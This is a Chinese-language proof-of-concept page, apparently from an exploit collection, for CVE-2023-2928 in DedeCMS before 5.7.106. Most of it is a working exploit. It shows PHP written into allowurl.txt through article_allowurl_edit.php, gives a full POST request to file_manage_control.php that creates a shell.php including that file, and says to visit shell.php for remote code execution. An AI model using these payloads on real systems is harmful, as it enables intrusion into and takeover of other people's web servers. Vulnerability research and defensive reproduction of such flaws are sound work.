Awesome-POC/CMS漏洞/DedeCMS 5.7 file_manage_control.php 文件包含 RCE CVE-2023-2928.md
2024-11-06 14:10:36 +08:00

65 lines
2.0 KiB
Markdown
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# DedeCMS 5.7 file_manage_control.php 文件包含 RCE CVE-2023-2928
## 漏洞描述
版本 5.7.106 之前的 DedeCMS 中存在漏洞,`/dede/article_allowurl_edit.php` 缺少对该文件中写入内容的过滤,结合 `/dede/file_manage_control.php` 文件构造文件包含代码,将构成远程代码执行。
## 漏洞影响
```
DedeCMS < 5.7.106
```
## 漏洞复现
文件 `/dede/article_allowurl_edit.php` 中未对文件内容做任何过滤,会把内容写入到
`/data/admin/allowurl.txt` 这个文件当中。
访问文件 `/dede/article_allowurl_edit.php`
```
www.dedecms.com
www.desdev.cn
bbs.dedecms.com
<?php phpinfo();?>
```
![](images/DedeCMS%205.7%20file_manage_control.php%20文件包含%20RCE%20CVE-2023-2928/image-20240327140733554.png)
通过`/dede/file_manage_control.php`文件构造文件包含代码:
```shell
# Payload
fmdo=edit&backurl=&token=&activepath=&filename=shell.php&str=<?php include_once("./data/admin/allowurl.txt");?>
```
```
POST /dede/file_manage_control.php HTTP/1.1
Host: <YOUR_IP>
Content-Length: 135
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://<YOUR_IP>
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://<YOUR_IP>/dede/article_allowurl_edit.php
Accept-Encoding: gzip, deflate, br
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Cookie:
Connection: close
fmdo=edit&backurl=&token=&activepath=&filename=shell.php&str=%3C%3Fphp+include_once%28%22.%2Fdata%2Fadmin%2Fallowurl.txt%22%29%3B%3F%3E
```
![](images/DedeCMS%205.7%20file_manage_control.php%20文件包含%20RCE%20CVE-2023-2928/image-20240327141101710.png)
成功写入,访问:
```
http://<YOUR_IP>/shell.php
```
![](images/DedeCMS%205.7%20file_manage_control.php%20文件包含%20RCE%20CVE-2023-2928/image-20240327141412133.png)